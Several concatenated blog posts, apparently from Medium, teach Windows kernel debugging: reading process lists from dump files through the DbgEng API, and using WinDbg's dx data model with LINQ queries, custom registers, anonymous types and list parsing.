Once the dump is loaded we can start reading it. The module we are most interested in here is nt — we are going to use the PsActiveProcessHead symbol as well as the EPROCESS structure that belong to it. So we need to get the base of the module using dataSpaces->ReadDebuggerData. This function receives 4 arguments — Index, Buffer, BufferSize and DataSize. The last one is an optional output parameter, telling us how many bytes were written, or if the buffer wasn’t large enough, how many bytes are needed. To keep things simple we will always pass nullptr as DataSize, since we know in advance the needed sizes for all of our data. The second and third arguments are pretty clear so no need to say much about them. And for the first argument we need to look at the list of options found at DbgEng.h:

// Indices for ReadDebuggerData interface
#define DEBUG_DATA_KernBase 24
#define DEBUG_DATA_BreakpointWithStatusAddr 32
#define DEBUG_DATA_SavedContextAddr 40
#define DEBUG_DATA_KiCallUserModeAddr 56
#define DEBUG_DATA_KeUserCallbackDispatcherAddr 64
#define DEBUG_DATA_PsLoadedModuleListAddr 72
#define DEBUG_DATA_PsActiveProcessHeadAddr 80
#define DEBUG_DATA_PspCidTableAddr 88
#define DEBUG_DATA_ExpSystemResourcesListAddr 96
#define DEBUG_DATA_ExpPagedPoolDescriptorAddr 104
#define DEBUG_DATA_ExpNumberOfPagedPoolsAddr 112
...

These are all commonly used symbols, so they get their own index to make querying their value faster and easier. Later in this post we’ll see how we can get the value of a symbol that is less common and isn’t on this list.

The first index on this list is, conveniently, DEBUG_DATA_KernBase. So we create a variable to get the base address of the nt module and call ReadDebuggerData:

ULONG64 kernBase;
dataSpaces->ReadDebuggerData(DEBUG_DATA_KernBase,
&kernBase,
sizeof(kernBase),
nullptr);

Next, we want to iterate over all the processes and print information about them. To do that we need the EPROCESS type. One annoying thing about the debugger API is that it doesn’t allow us to use types like we would if they were in a header file. We can’t declare a variable of type EPROCESS and access its fields. Instead we need to access memory through a type ID and the offsets inside the type. Foe example, if we want to access the ImageFileName field inside a process we will need to read the information that’s found in processAddr + imageFileNameOffset. But this is getting a bit ahead. First we need to get the type ID of _EPROCESS using debugSymbols->GetTypeId, which receives the module base, type name and an output argument for the type ID. As the name suggests, this function doesn’t give us the type itself, only an identifier that we’ll use to get offsets inside the structure:

ULONG EPROCESS;
debugSymbols->GetTypeId(kernBase, “_EPROCESS”, &EPROCESS);

Now let’s get the offsets of the fields inside the EPROCESS so we can easily access them. Since we want to print the name and PID of each process we’ll need the ImageFileName and UniqueProcessId fields, in addition to ActiveProcessLinks so we iterate over the processes. To get those we’ll call debugSymbols->GetFieldOffset, which receives the module base, type ID, field name and an output argument that will receive the field offset:

ULONG imageFileNameOffset;
ULONG uniquePidOffset;
ULONG activeProcessLinksOffset;
debugSymbols->GetFieldOffset(kernBase,
EPROCESS,
“ImageFileName”,
&imageFileNameOffset);
debugSymbols->GetFieldOffset(kernBase,
EPROCESS,
“UniqueProcessId”,
&uniquePidOffset);
debugSymbols->GetFieldOffset(kernBase,
EPROCESS,
“ActiveProcessLinks”,
&activeProcessLinksOffset);

To start iterating the process list we need to read PsActiveProcessHead. You might have noticed earlier that this symbol has an index in DbgEng.h so it can be read directly using ReadDebuggerData. But for this example we won’t read it that way, and instead show how to read it like a symbol that doesn’t have an index. So first we need to get the symbol offset in the dump file, using debugSymbols->GetOffsetByName:

ULONG64 activeProcessHead;
debugSymbols->GetOffsetByName(“nt!PsActiveProcessHead”,
&activeProcessHead);

This doesn’t give us the actual value yet, only the offset of this symbol. To get the value we’ll need to read the memory that this address points to from the dump using dataSpaces->ReadVirtual, which receives an address to read from, Buffer, BufferSize and an optional output argument BytesRead. We know that this symbol points to a LIST_ENTRY structure so we can just define a local linked list and read the variable into it. In this case we got lucky — the LIST_ENTRY structure is documented. If this symbol contained a non-documented structure this process would require a couple more steps and be a bit more painful.

LIST_ENTRY activeProcessLinks;
dataSpaces->ReadVirtual(activeProcessHead,
&activeProcessLinks,
sizeof(activeProcessLinks),
nullptr);

Now we have almost everything we need to start iterating the process list! We’ll define a local process variable and use it to store the address of the current process we’re looking at. In each iteration, activeProcessLinks.Flink will point to the first process in the system, but it won’t point to the beginning of the EPROCESS. It points to the ActiveProcessLinks field, so to get to the beginning of the structure we’ll need to subtract the offset of ActiveProcessLinks field from the address (basically what the CONTAINING_RECORD macro would do if we could use it here). Notice that we are using a ULONG64 here on purpose, instead of a ULONG_PTR to save us the pain of using pointer arithmetic and avoiding casts in future function calls, since most debugger API functions receive arguments as ULONG64:

ULONG64 process;
process = (ULONG64)activeProcessLinks.Flink — activeProcessLinksOffset;

The process iteration is pretty simple — for each process we want to read the ImageFileName value and UniqueProcessId value, and then read the next process pointer from ActiveProcessLinks. Notice that we cannot access any data in the debugger directly. The addresses we have are meaningless in the context of our current process (they are also kernel addresses, and our application is running in user mode and not necessarily on the right machine), and we need to call dataSpaces->ReadVirtual, or any of the other debugger functions that let us read data, to access any of the memory and will have to read these values for each process.

Generally we don’t have to read each value separately, we can also read the whole EPROCESS structure with debugSymbols->ReadTypedDataVirtual for each process and then access the fields by their offsets. But the EPROCESS structure is very large and we only need a few specific fields, so reading the whole structure is pretty wasteful and not necessary in this case.

We now have everything we need to implement our process iteration:

UCHAR imageFileName[15];
ULONG64 uniquePid;
LIST_ENTRY activeProcessLinks;
do
{
//
// Read process name, pid and activeProcessLinks
// for the current process
//
dataSpaces->ReadVirtual(process + imageFileNameOffset,
&imageFileName,
sizeof(imageFileName),
nullptr);
dataSpaces->ReadVirtual(process + uniquePidOffset,
&uniquePid,
sizeof(uniquePid),
nullptr);
dataSpaces->ReadVirtual(process + activeProcessLinksOffset,
&activeProcessLinks,
sizeof(activeProcessLinks),
nullptr);
printf(“Current process name: %s, pid: %d\n”,
imageFileName,
uniquePid);
//
// Get the next process from the list and
// subtract activeProcessLinksOffset
// to get to the start of the EPROCESS.
//
process = (ULONG64)activeProcessLinks.Flink — activeProcessLinksOffset;
} while ((ULONG64)activeProcessLinks.Flink != activeProcessHead);

That’s it, that’s all we need to get this nice output:

Some of you might notice that a few of these process names look incomplete. This is because the ImageFileName field only has the first 15 bytes of the process name, while the full name is saved in an OBJECT_NAME_INFORMATION structure (which is actually just a UNICODE_STRING) in SeAuditProcessCreationInfo.ImageFileName. But in this post I wanted to keep things simple so we’ll use ImageFileName here.

Now we only have one last part left — being good developers and cleaning up after ourselves:

if (debugClient != nullptr)
{
debugClient->EndSession(DEBUG_END_ACTIVE_DETACH);
debugClient->Release();
}
if (debugSymbols != nullptr)
{
debugSymbols->Release();
}
if (dataSpaces != nullptr)
{
dataSpaces->Release();
}
if (debugControl != nullptr)
{
debugControl->Release();
}

This was a very brief, but hopefully helpful, introduction to the debugger API. There are endless more options available with this, looking at DbgEng.h or at the official documentation should reveal a lot more. I hope you all find this as useful as I do and will find new and interesting things to use it for.


Windows Debugger API — The End of Versioned Structures was originally published in The Startup on Medium, where people are continuing the conversation by highlighting and responding to this story.

WinDbg — the Fun Way: Part 1

WinDbg — the Fun Way: Part 1

A while ago, WinDbg added support for a new debugger data model, a change that completely changed the way we can use WinDbg. No more horrible MASM commands and obscure syntax. No more copying addresses or parameters to a Notepad file so that you can use them in the next commands without scrolling up. No more running the same command over and over with different addresses to iterate over a list or an array.

This is part 1 of this guide, because I didn’t actually think anyone would read through 8000 words of me explaining WinDbg commands. So you get 2 posts of 4000 words! That’s better, right?

In this first post we will learn the basics of how to use this new data model — using custom registers and new built-in registers, iterating over objects, searching them and filtering them and customizing them with anonymous types. And finally we will learn how to parse arrays and lists in a much nicer and easier way than you’re used to.

And in the net post we’ll learn the more complicated and fancier methods and features that this data model gives us. Now that we all know what to expect and grabbed another cup of coffee, let’s start!

This data model, accessed in WinDbg through the dx command, is an extremely powerful tool, able to define custom variables, structures, functions and use a wide range of new capabilities. It also lets us search and filter information with LINQ — a natural query language built on top of database languages such as SQL.

This data model is documented and even has usage examples on GitHub. Additionally, all of its modules have documentation that can be viewed in the debugger with dx -v <method> (though you will get the same documentation if you run dx <method> without the -v flag):

dx -v Debugger.Utility.Collections.FromListEntry
Debugger.Utility.Collections.FromListEntry [FromListEntry(ListEntry, [<ModuleName | ModuleObject>], TypeName, FieldExpression) — Method which converts a LIST_ENTRY specified by the ‘ListEntry’ parameter of types whose name is specified by the string ‘TypeName’ and whose embedded links within that type are accessed via an expression specified by the string ‘FieldExpression’ into a collection object. If an optional module name or object is specified, the type name is looked up in the context of such module]

There has also been some external documentation, but I felt like there were things that needed further explanation and that this feature is worth more attention than it receives.

Custom Registers

First, NatVis adds the option for custom registers. Kind of like MASM had @$t1, @$t2, @$t3 , etc. Only now you can call them whatever name you want, and they can have a type of your choice:

dx @$myString = “My String”
dx @$myInt = 123

We can see all our variables with dx @$vars and remove them with dx @$vars.Remove("var name"), or clear all with @$vars.Clear(). We can also use dx to show handle more complicated structures, such as an EPROCESS. As you might know, symbols in public PDBs don’t have type information. With the old debugger, this wasn’t always a problem, since in MASM, there’s no types anyway, and we could use the poi command to dereference a pointer.

0: kd> dt nt!_EPROCESS poi(nt!PsInitialSystemProcess)
+0x000 Pcb : _KPROCESS
+0x2e0 ProcessLock : _EX_PUSH_LOCK
+0x2e8 UniqueProcessId : (null)
...

But things got messier when the variable isn’t a pointer, like with PsIdleProcess:

0: kd> dt nt!_KPROCESS @@masm(nt!PsIdleProcess)
+0x000 Header : _DISPATCHER_HEADER
+0x018 ProfileListHead : _LIST_ENTRY [ 0x00000048`0411017e - 0x00000000`00000004 ]
+0x028 DirectoryTableBase : 0xffffb10b`79f08010
+0x030 ThreadListHead : _LIST_ENTRY [ 0x00001388`00000000 - 0xfffff801`1b401000 ]
+0x040 ProcessLock : 0
+0x044 ProcessTimerDelay : 0
+0x048 DeepFreezeStartTime : 0xffffe880`00000000
...

We first have to use explicit MASM operators to get the address of PsIdleProcess and then print it as an EPROCESS. With dx we can be smarter and cast symbols directly, using c-style casts. But when we try to cast nt!PsInitialSystemProcess to a pointer to an EPROCESS:

dx @$systemProc = (nt!_EPROCESS*)nt!PsInitialSystemProcess
Error: No type (or void) for object at Address 0xfffff8074ef843a0

We get an error.

Like I mentioned, symbols have no type. And we can’t cast something with no type. So we need to take the address of the symbol, and cast it to a pointer to the type we want (In this case, PsInitialSystemProcess is already a pointer to an EPROCESS so we need to cast its address to a pointer to a pointer to an EPROCESS).

dx @$systemProc = *(nt!_EPROCESS**)&nt!PsInitialSystemProcess

Now that we have a typed variable, we can access its fields like we would do in C:

0: kd> dx @$systemProc->ImageFileName
@$systemProc->ImageFileName               [Type: unsigned char [15]]
[0] : 0x53 [Type: unsigned char]
[1] : 0x79 [Type: unsigned char]
[2] : 0x73 [Type: unsigned char]
[3] : 0x74 [Type: unsigned char]
[4] : 0x65 [Type: unsigned char]
[5] : 0x6d [Type: unsigned char]
[6] : 0x0 [Type: unsigned char]

And we can cast that to get a nicer output:

dx (char*)@$systemProc->ImageFileName
(char*)@$systemProc->ImageFileName                 : 0xffffc10c8e87e710 : "System" [Type: char *]

We can also use ToDisplayString to cast it from a char* to a string. We have two options — ToDisplayString("s"), which will cast it to a string and keep the quotes as part of the string, or ToDisplayString("sb"), which will remove them:

dx ((char*)@$systemProc->ImageFileName).ToDisplayString("s")
((char*)@$systemProc->ImageFileName).ToDisplayString("s") : "System"
Length : 0x8
dx ((char*)@$systemProc->ImageFileName).ToDisplayString("sb")
((char*)@$systemProc->ImageFileName).ToDisplayString("sb") : System
Length : 0x6

Built-in Registers

This is fun, but for processes (and a few other things) there is an even easier way. Together with NatVis’ implementation in WinDbg we got some “free” registers already containing some useful information — curframe, curprocess, cursession, curstack and curthread. It’s not hard to guess their contents by their names, but let’s take a look:

@$curframe

Gives us information about the current frame. I never actually used it myself, but it might be useful:

dx -r1 @$curframe.Attributes
@$curframe.Attributes                
InstructionOffset : 0xfffff8074ebda1e1
ReturnOffset : 0xfffff80752ad2b61
FrameOffset : 0xfffff80751968830
StackOffset : 0xfffff80751968838
FuncTableEntry : 0x0
Virtual : 1
FrameNumber : 0x0

@$curprocess

A container with information about the current process. This is not an EPROCESS (though it does contain it). It contains easily accessible information about the current process, like its threads, loaded modules, handles, etc.

dx @$curprocess
@$curprocess                 : System [Switch To]
KernelObject [Type: _EPROCESS]
Name : System
Id : 0x4
Handle : 0xf0f0f0f0
Threads
Modules
Environment
Devices
Io

In KernelObject we have the EPROCESS, but we can also use the other fields. For example, we can access all the handles held by the process through @$curprocess.Io.Handles, which will lead us to an array of handles, indexed by their handle number:

dx @$curprocess.Io.Handles
@$curprocess.Io.Handles                
[0x4]
[0x8]
[0xc]
[0x10]
[0x14]
[0x18]
[0x1c]
[0x20]
[0x24]
[0x28]
...

System has a lot of handles, these are just the first few! Let’s just take a look at the first one (which we can also access through @$curprocess.Io.Handles[0x4]):

dx @$curprocess.Io.Handles.First()
@$curprocess.Io.Handles.First()                
Handle : 0x4
Type : Process
GrantedAccess : Delete | ReadControl | WriteDac | WriteOwner | Synch | Terminate | CreateThread | VMOp | VMRead | VMWrite | DupHandle | CreateProcess | SetQuota | SetInfo | QueryInfo | SetPort
Object [Type: _OBJECT_HEADER]

We can see the handle, the type of object the handle is for, its granted access, and we even have a pointer to the object itself (or its object header, to be precise)!

There are plenty more things to find under this register, and I encourage you to investigate them, but I will not show all of them.

By the way, have we mentioned already that dx allows tab completion?

@$cursession

As its name suggests, this register gives us information about the current debugger session:

dx @$cursession
@$cursession                 : Remote KD: KdSrv:Server=@{<Local>},Trans=@{NET:Port=55556,Key=1.2.3.4,Target=192.168.251.21}
Processes
Id : 0
Devices
Attributes

So, we can get information about our debugger session, which is always fun. But there are more useful things to be found here, such as the Processes field, which is an array of all processes, indexed by their PID. Let’s pick one of them:

dx @$cursession.Processes[0x1d8]
@$cursession.Processes[0x1d8]                 : smss.exe [Switch To]
KernelObject [Type: _EPROCESS]
Name : smss.exe
Id : 0x1d8
Handle : 0xf0f0f0f0
Threads
Modules
Environment
Devices
Io

Now we can get all that useful information about every single process! We can also search through processes by filtering them based on a search (such as by their name, specific modules loaded into them, strings in their command line, etc. But I will explain all of that later.

@$curstack

This register contains a single field — frames — which shows us the current stack in an easily-handled way:

dx @$curstack.Frames
@$curstack.Frames                
[0x0] : nt!DbgBreakPointWithStatus + 0x1 [Switch To]
[0x1] : kdnic!TXTransmitQueuedSends + 0x125 [Switch To]
[0x2] : kdnic!TXSendCompleteDpc + 0x14d [Switch To]
[0x3] : nt!KiProcessExpiredTimerList + 0x169 [Switch To]
[0x4] : nt!KiRetireDpcList + 0x4e9 [Switch To]
[0x5] : nt!KiIdleLoop + 0x7e [Switch To]

@$curthread

Gives us information about the current thread, just like @$curprocess:

dx @$curthread
@$curthread                 : nt!DbgBreakPointWithStatus+0x1 (fffff807`4ebda1e1)  [Switch To]
KernelObject [Type: _ETHREAD]
Id : 0x0
Stack
Registers
Environment

It contains the ETHREAD in KernelObject, but also contains the TEB in Environment, and can show us the thread ID, stack and registers.

dx @$curthread.Registers
@$curthread.Registers                
User
Kernel
SIMD
FloatingPoint

We have them conveniently separated to user, kernel, SIMD and FloatingPoint registers, and we can look at each separately:

dx -r1 @$curthread.Registers.Kernel
@$curthread.Registers.Kernel
cr0 : 0x80050033
cr2 : 0x207b8f7abbe
cr3 : 0x6d4002
cr4 : 0x370678
cr8 : 0xf
gdtr : 0xffff9d815ffdbfb0
gdtl : 0x57
idtr : 0xffff9d815ffd9000
idtl : 0xfff
tr : 0x40
ldtr : 0x0
kmxcsr : 0x1f80
kdr0 : 0x0
kdr1 : 0x0
kdr2 : 0x0
kdr3 : 0x0
kdr6 : 0xfffe0ff0
kdr7 : 0x400

xcr0 : 0x1f

Searching and Filtering

A very useful thing that NatVis allows us to do, which we briefly mentioned before, is searching, filtering and ordering information in an SQL-like way through Select, Where, OrderBy and more.

For example, let’s try to find all the processes that don’t enable high entropy ASLR. This information is stored in the EPROCESS->MitigationFlags field, and the value for HighEntropyASLREnabled is 0x20 (all values can be found here and in the public symbols).

First, we’ll declare a new register with that value, just to make things more readable:

0: kd> dx @$highEntropyAslr = 0x20
@$highEntropyAslr = 0x20 : 32

And then create our query to iterate over all processes and only pick ones where the HighEntropyASLREnabled bit is not set:

dx -r1 @$cursession.Processes.Where(p => (p.KernelObject.MitigationFlags & @$highEntropyAslr) == 0)
@$cursession.Processes.Where(p => (p.KernelObject.MitigationFlags & @$highEntropyAslr) == 0)                
[0x910] : spoolsv.exe [Switch To]
[0xb40] : IpOverUsbSvc.exe [Switch To]
[0x1610] : explorer.exe [Switch To]
[0x1d8c] : OneDrive.exe [Switch To]

Or we can check the flag directly through MitigationFlagsValues and get the same results:

dx -r1 @$cursession.Processes.Where(p => (p.KernelObject.MitigationFlagsValues.HighEntropyASLREnabled == 0))
@$cursession.Processes.Where(p => (p.KernelObject.MitigationFlagsValues.HighEntropyASLREnabled == 0))                
[0x910] : spoolsv.exe [Switch To]
[0xb40] : IpOverUsbSvc.exe [Switch To]
[0x1610] : explorer.exe [Switch To]
[0x1d8c] : OneDrive.exe [Switch To]

We can also use Select() to only show certain attributes of things we iterate over. Here we choose to see only the number of threads each process has:

dx @$cursession.Processes.Select(p => p.Threads.Count())
@$cursession.Processes.Select(p => p.Threads.Count())                
[0x0] : 0x6
[0x4] : 0xeb
[0x78] : 0x4
[0x1d8] : 0x5
[0x244] : 0xe
[0x294] : 0x8
[0x2a0] : 0x10
[0x2f8] : 0x9
[0x328] : 0xa
[0x33c] : 0xd
[0x3a8] : 0x2c
[0x3c0] : 0x8
[0x3c8] : 0x8
[0x204] : 0x15
[0x300] : 0x1d
[0x444] : 0x3f
...

We can also see everything in decimal by adding , d to the end of the command, to specify the output format (we can also use b for binary, o for octal or s for string):

dx @$cursession.Processes.Select(p => p.Threads.Count()), d
@$cursession.Processes.Select(p => p.Threads.Count()), d                
[0] : 6
[4] : 235
[120] : 4
[472] : 5
[580] : 14
[660] : 8
[672] : 16
[760] : 9
[808] : 10
[828] : 13
[936] : 44
[960] : 8
[968] : 8
[516] : 21
[768] : 29
[1092] : 63
...

Or, in a slightly more complicated example, see the ideal processor for each thread running in a certain process (I chose a process at random, just to see something that is not the System process):

dx -r1 @$cursession.Processes[0x1b2c].Threads.Select(t => t.Environment.EnvironmentBlock.CurrentIdealProcessor.Number)
@$cursession.Processes[0x1b2c].Threads.Select(t => t.Environment.EnvironmentBlock.CurrentIdealProcessor.Number)                
[0x1b30] : 0x1 [Type: unsigned char]
[0x1b40] : 0x2 [Type: unsigned char]
[0x1b4c] : 0x3 [Type: unsigned char]
[0x1b50] : 0x4 [Type: unsigned char]
[0x1b48] : 0x5 [Type: unsigned char]
[0x1b5c] : 0x0 [Type: unsigned char]
[0x1b64] : 0x1 [Type: unsigned char]

We can also use OrderBy to get nicer results, for example to get a list of all processes sorted by alphabetical order:

dx -r1 @$cursession.Processes.OrderBy(p => p.Name)
@$cursession.Processes.OrderBy(p => p.Name)                
[0x1848] : ApplicationFrameHost.exe [Switch To]
[0x0] : Idle [Switch To]
[0xb40] : IpOverUsbSvc.exe [Switch To]
[0x106c] : LogonUI.exe [Switch To]
[0x754] : MemCompression [Switch To]
[0x187c] : MicrosoftEdge.exe [Switch To]
[0x1b94] : MicrosoftEdgeCP.exe [Switch To]
[0x1b7c] : MicrosoftEdgeSH.exe [Switch To]
[0xb98] : MsMpEng.exe [Switch To]
[0x1158] : NisSrv.exe [Switch To]
[0x1d8c] : OneDrive.exe [Switch To]
[0x78] : Registry [Switch To]
[0x1ed0] : RuntimeBroker.exe [Switch To]
...

If we want them in a descending order, we can use OrderByDescending.

But what if we want to pick more than one attribute to see? There is a solution for that too.

Anonymous Types

We can declare a type of our own, that will be unnamed and only used in the scope of our query, using this syntax: Select(x => new { var1 = x.A, var2 = x.B, ...}).

We’ll try it out on one of our previous examples. Let’s say for each process we want to show a process name and its thread count:

dx @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})
@$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})                
[0x0]
[0x4]
[0x78]
[0x1d8]
[0x244]
[0x294]
[0x2a0]
[0x2f8]
[0x328]
...

But now we only see the process container, not the actual information. To see the information itself we need to go one layer deeper, by using -r2. The number specifies the output recursion level. The default is -r1, -r0 will show no output, -r2 will show two levels, etc.

dx -r2 @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})
@$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})                
[0x0]
Name : Idle
ThreadCount : 0x6
[0x4]
Name : System
ThreadCount : 0xeb
[0x78]
Name : Registry
ThreadCount : 0x4
[0x1d8]
Name : smss.exe
ThreadCount : 0x5
[0x244]
Name : csrss.exe
ThreadCount : 0xe
[0x294]
Name : wininit.exe
ThreadCount : 0x8
[0x2a0]
Name : csrss.exe
ThreadCount : 0x10
...

This already looks much better, but we can make it look even nicer with the new grid view, accessed through the -g flag:

dx -g @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})
Output of dx -g @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()})

OK, this just looks awesome. And yes, these headings are clickable and will sort the table!

And if we want to see the PIDs and thread numbers in decimal we can just add , d to the end of the command:

dx -g @$cursession.Processes.Select(p => new {Name = p.Name, ThreadCount = p.Threads.Count()}),d

Arrays and Lists

DX also gives us a new, much easier way, to handle arrays and lists with new syntax.
Let’s look at arrays first, where the syntax is dx *(TYPE(*)[Size])<pointer to array start>.

For this example, we will dump the contents on PsInvertedFunctionTable, which contains an array of up to 256 cached modules in its TableEntry field.

First, we will get the pointer of this symbol and cast it to _INVERTED_FUNCTION_TABLE:

dx @$inverted = (nt!_INVERTED_FUNCTION_TABLE*)&nt!PsInvertedFunctionTable
@$inverted = (nt!_INVERTED_FUNCTION_TABLE*)&nt!PsInvertedFunctionTable                 : 0xfffff8074ef9b010 [Type: _INVERTED_FUNCTION_TABLE *]
[+0x000] CurrentSize : 0xbe [Type: unsigned long]
[+0x004] MaximumSize : 0x100 [Type: unsigned long]
[+0x008] Epoch : 0x19e [Type: unsigned long]
[+0x00c] Overflow : 0x0 [Type: unsigned char]
[+0x010] TableEntry [Type: _INVERTED_FUNCTION_TABLE_ENTRY [256]]

Now we can create our array. Unfortunately, the size of the array has to be static and can’t use a register, so we need to input it manually, based on CurrentSize (or just set it to 256, which is the size of the whole array). And we can use the grid view to print it nicely:

dx -g @$tableEntry = *(nt!_INVERTED_FUNCTION_TABLE_ENTRY(*)[0xbe])@$inverted->TableEntry
Output of dx -g @$tableEntry = *(nt!_INVERTED_FUNCTION_TABLE_ENTRY(*)[0xbe])@$inverted->TableEntry

Alternatively, we can use the Take() method, which receives a number and prints that amount of elements from a collection, and get the same result:

dx -g @$inverted->TableEntry->Take(@$inverted->CurrentSize)

We can also do the same thing to see the UserInvertedFunctionTable (right after we switch to user that’s not System), starting from nt!KeUserInvertedFunctionTable:

dx @$inverted = *(nt!_INVERTED_FUNCTION_TABLE**)&nt!KeUserInvertedFunctionTable
@$inverted = *(nt!_INVERTED_FUNCTION_TABLE**)&nt!KeUserInvertedFunctionTable                 : 0x7ffa19e3a4d0 [Type: _INVERTED_FUNCTION_TABLE *]
[+0x000] CurrentSize : 0x2 [Type: unsigned long]
[+0x004] MaximumSize : 0x200 [Type: unsigned long]
[+0x008] Epoch : 0x6 [Type: unsigned long]
[+0x00c] Overflow : 0x0 [Type: unsigned char]
[+0x010] TableEntry [Type: _INVERTED_FUNCTION_TABLE_ENTRY [256]]
dx -g @$inverted->TableEntry->Take(@$inverted->CurrentSize)

And of course we can use Select() , Where() or other functions to filter, sort or select only specific fields for our output and get tailored results that fit exactly what we need.

The next thing to handle is lists — Windows is full of linked lists, you can find them everywhere. Linking processes, threads, modules, DPCs, IRPs, and more.

Fortunately the new data model has a very useful Debugger method - Debugger.Utiilty.Collections.FromListEntry, which takes in a linked list head, type and name of the field in this type containing the LIST_ENTRY structure, and will return a container of all the list contents.

So, for our example let’s dump all the handle tables in the system. Our starting point will be the symbol nt!HandleTableListHead, the type of the objects in the list is nt!_HANDLE_TABLE and the field linking the list is HandleTableList:

dx -r2 Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, "nt!_HANDLE_TABLE", "HandleTableList")
Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, "nt!_HANDLE_TABLE", "HandleTableList")                
[0x0] [Type: _HANDLE_TABLE]
[+0x000] NextHandleNeedingPool : 0x3400 [Type: unsigned long]
[+0x004] ExtraInfoPages : 0 [Type: long]
[+0x008] TableCode : 0xffff8d8dcfd18001 [Type: unsigned __int64]
[+0x010] QuotaProcess : 0x0 [Type: _EPROCESS *]
[+0x018] HandleTableList [Type: _LIST_ENTRY]
[+0x028] UniqueProcessId : 0x4 [Type: unsigned long]
[+0x02c] Flags : 0x0 [Type: unsigned long]
[+0x02c ( 0: 0)] StrictFIFO : 0x0 [Type: unsigned char]
[+0x02c ( 1: 1)] EnableHandleExceptions : 0x0 [Type: unsigned char]
[+0x02c ( 2: 2)] Rundown : 0x0 [Type: unsigned char]
[+0x02c ( 3: 3)] Duplicated : 0x0 [Type: unsigned char]
[+0x02c ( 4: 4)] RaiseUMExceptionOnInvalidHandleClose : 0x0 [Type: unsigned char]
[+0x030] HandleContentionEvent [Type: _EX_PUSH_LOCK]
[+0x038] HandleTableLock [Type: _EX_PUSH_LOCK]
[+0x040] FreeLists [Type: _HANDLE_TABLE_FREE_LIST [1]]
[+0x040] ActualEntry [Type: unsigned char [32]]
[+0x060] DebugInfo : 0x0 [Type: _HANDLE_TRACE_DEBUG_INFO *]
[0x1] [Type: _HANDLE_TABLE]
[+0x000] NextHandleNeedingPool : 0x400 [Type: unsigned long]
[+0x004] ExtraInfoPages : 0 [Type: long]
[+0x008] TableCode : 0xffff8d8dcb651000 [Type: unsigned __int64]
[+0x010] QuotaProcess : 0xffffb90a530e4080 [Type: _EPROCESS *]
[+0x018] HandleTableList [Type: _LIST_ENTRY]
[+0x028] UniqueProcessId : 0x78 [Type: unsigned long]
[+0x02c] Flags : 0x10 [Type: unsigned long]
[+0x02c ( 0: 0)] StrictFIFO : 0x0 [Type: unsigned char]
[+0x02c ( 1: 1)] EnableHandleExceptions : 0x0 [Type: unsigned char]
[+0x02c ( 2: 2)] Rundown : 0x0 [Type: unsigned char]
[+0x02c ( 3: 3)] Duplicated : 0x0 [Type: unsigned char]
[+0x02c ( 4: 4)] RaiseUMExceptionOnInvalidHandleClose : 0x1 [Type: unsigned char]
[+0x030] HandleContentionEvent [Type: _EX_PUSH_LOCK]
[+0x038] HandleTableLock [Type: _EX_PUSH_LOCK]
[+0x040] FreeLists [Type: _HANDLE_TABLE_FREE_LIST [1]]
[+0x040] ActualEntry [Type: unsigned char [32]]
[+0x060] DebugInfo : 0x0 [Type: _HANDLE_TRACE_DEBUG_INFO *]
...

See the QuotaProcess field? That field points to the process that this handle table belongs to. Since every process has a handle table, this allows us to enumerate all the processes on the system in a way that’s not widely known. This method has been used by rootkits in the past to enumerate processes without being detected by EDR products. So to implement this we just need to Select() the QuotaProcess from each entry in our handle table list. To create a nicer looking output we can also create an anonymous container with the process name, PID and EPROCESS pointer:

dx -r2 (Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, "nt!_HANDLE_TABLE", "HandleTableList")).Select(h => new { Object = h.QuotaProcess, Name = ((char*)h.QuotaProcess->ImageFileName).ToDisplayString("s"), PID = (__int64)h.QuotaProcess->UniqueProcessId})
(Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, "nt!_HANDLE_TABLE", "HandleTableList")).Select(h => new { Object = h.QuotaProcess, Name = ((char*)h.QuotaProcess->ImageFileName).ToDisplayString("s"), PID = (__int64)h.QuotaProcess->UniqueProcessId})
[0x0]            : Unspecified error (0x80004005)
[0x1]
Object : 0xffffb10b70906080 [Type: _EPROCESS *]
Name : "Registry"
PID : 120 [Type: __int64]
[0x2]
Object : 0xffffb10b72eba0c0 [Type: _EPROCESS *]
Name : "smss.exe"
PID : 584 [Type: __int64]
[0x3]
Object : 0xffffb10b76586140 [Type: _EPROCESS *]
Name : "csrss.exe"
PID : 696 [Type: __int64]
[0x4]
Object : 0xffffb10b77132140 [Type: _EPROCESS *]
Name : "wininit.exe"
PID : 772 [Type: __int64]
[0x5]
Object : 0xffffb10b770a2080 [Type: _EPROCESS *]
Name : "csrss.exe"
PID : 780 [Type: __int64]
[0x6]
Object : 0xffffb10b7716d080 [Type: _EPROCESS *]
Name : "winlogon.exe"
PID : 852 [Type: __int64]
...

PID : 852 [Type: __int64]

The first result is the table belonging to the System process and it does not have a QuotaProcess, which is the reason this query returns an error for it. But it should work perfectly for every other entry in the array. If we want to make our output prettier, we can filter out entries where QuotaProcess == 0 before we do the Select():

dx -r2 (Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, “nt!_HANDLE_TABLE”, “HandleTableList”)).Where(h => h.QuotaProcess != 0).Select(h => new { Object = h.QuotaProcess, Name = ((char*)h.QuotaProcess->ImageFileName).ToDisplayString("s"), PID = h.QuotaProcess->UniqueProcessId})

As we already showed before, we can also print this list in a graphic view or use any LINQ queries to make the output match our needs.

This is the end of our first part, but don’t worry, the second part is right here, and it contains all the fancy new dx methods such as a new disassembler, defining our own methods, conditional breakpoints that actually work, and more.

WinDbg — the Fun Way: Part 2

WinDbg — the Fun Way: Part 2

Welcome to part 2 of me trying to make you enjoy debugging on Windows (wow, I’m a nerd)!

In the first part we got to know the basics of the new debugger data model — Using the new objects, having custom registers, searching and filtering output, declaring anonymous types and parsing lists and arrays. In this part we will learn how to use legacy commands with dx, get to know the amazing new disassembler, create synthetic methods and types, see the fancy changes to breakpoints and use the filesystem from within the debugger.

